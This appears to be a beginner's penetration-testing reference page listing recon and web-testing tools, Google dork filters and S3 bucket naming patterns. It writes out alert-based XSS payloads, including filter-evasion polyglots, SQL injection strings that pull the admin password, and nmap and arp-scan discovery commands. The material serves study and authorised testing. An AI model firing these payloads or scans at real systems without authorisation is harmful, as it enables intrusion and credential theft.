Base64 Decode - Decode or encode base64.
Wappalyze - Find out the technology stack of a website.
SecLists - A collection of lists used during security assessments.
Sublist3r - Collects and gathers subdomains for a target domain.
fuff - Web fuzzer.
Wfuzz - Web fuzzer.
XSS Hunter - Performs Blind XSS attacks and captures cookies, URLs, page contents.
XSStrike - A Cross Site Scripting detection suite.
Burp Suite - A tool for performing security testing of web applications.
FoxyProxy - Proxy management browser extension.
CloudSploit - Detects security risks in cloud infrastructure accounts.
DNSDumpster - A research tool that can discover hosts related to a domain.
Nmap - Discovers hosts and services on a computer network.
arp-scan - Uses the ARP protocol to discover and fingerprint IP hosts on the local network.
OWASP Top 10
OWASP Web Security Testing Guide
Postgres SQL Injection Cheat Sheet
Reverse Shell Cheat Sheet
Bug Bounty Cheatsheet
Command Injection Payload List
A Starters Guide to Pentesting with OWASP
A set of guidelines and best practices to help organizations build and improve their cybersecurity. Frameworks are a blueprint for managing risk and reducing vulnerabilities.
- Page Source
- Comments ()
- Links (/secret_page)
- Directories (/assets)
- Files (./info.zip)
- /robots.txt
- /sitemap.xml
- Default favicon of framework https://wiki.owasp.org/index.php/OWASP_favicon_database
- HTTP headers (versions, web server software, programming language)
- Check for default credentials
Filter | Example |
---|---|
site | site:example.com |
filetype | filetype:csv |
inurl | inurl:admin |
intitle | intitle:admin |
Example: "-site:www.example.com site:*.example.com" would only contain results leading to the domain name example.com such as www.staff.example.com but exclude any links to www.example.com.
- Wappalyzer
- Wayback Machine
- GitHub search (Company, website names for areas and passwords)
- S3 bucket permissions ((http(s)://{name}.s3.amazonaws.com) {name}-assets, {name}-www, {name}-public, {name}-private)
OWASP XSS Overview
THM XSS Room
<script>alert('XSS');</script>
"><script>alert('XSS');</script>
</textarea><script>alert('XSS');</script>
';alert('XSS');//
<sscriptcript>alert('XSS');</sscriptcript>
/images/cat.jpg" onload="alert('XSS');
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */onerror=alert('XSS') )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert('XSS')//>\x3e
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert('XSS') )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert('XSS')//>\x3e
<iframe src=\"javascript:alert(XSS)\">
<iframe src="javascript:alert(`XSS`)">
OWASP SQL Injection
W3Schools SQL Injection
THM SQL Injection
OWASP Testing PostgreSQL
- Inband: data is extracted using the same channel that is used to inject the SQL code. This is the most straightforward kind of attack, in which the retrieved data is presented directly in the application web page.
- Out-of-band: data is retrieved using a different channel (e.g., an email with the results of the query is generated and sent to the tester).
- Inferential or Blind: there is no actual transfer of data, but the tester is able to reconstruct the information by sending particular requests and observing the resulting behavior of the DB Server.
;
'
' OR 1=1;--
1 UNION SELECT 1,2
%00' UNION SELECT password FROM Users WHERE username='admin'--
%27%20UNION%20SELECT%20password%20FROM%20Users%20WHERE%20name%3D%27admin%27--
UNION ALL SELECT user,NULL,NULL--
Set up browser proxy and certificate. Turn intercept on and in proxy options configure rules - "Or Request Was Intercepted", "And URL Is in target scope". Send to repeater or send to intruder.
- Browser hanging - Turn off Intercept.
- Can't intercept - Update Scope.
Return all the IPv4 addresses: nslookup -type=A example.com 0.0.0.0
Email servers and configurations for a particular domain: nslookup -type=MX example.com
whois example.com
nslookup example.com
nmap -sL -n 0.0.0.0/0.
nmap -PR -sn 0.0.0.0/24
nmap -PE -sn 0.0.0.0/24
nmap -PP -sn 0.0.0.0/24
nmap -PM -sn 0.0.0.0/24.
nmap -PS -sn 0.0.0.0/24
sudo nmap -PA -sn MACHINE_IP/24
arp-scan -l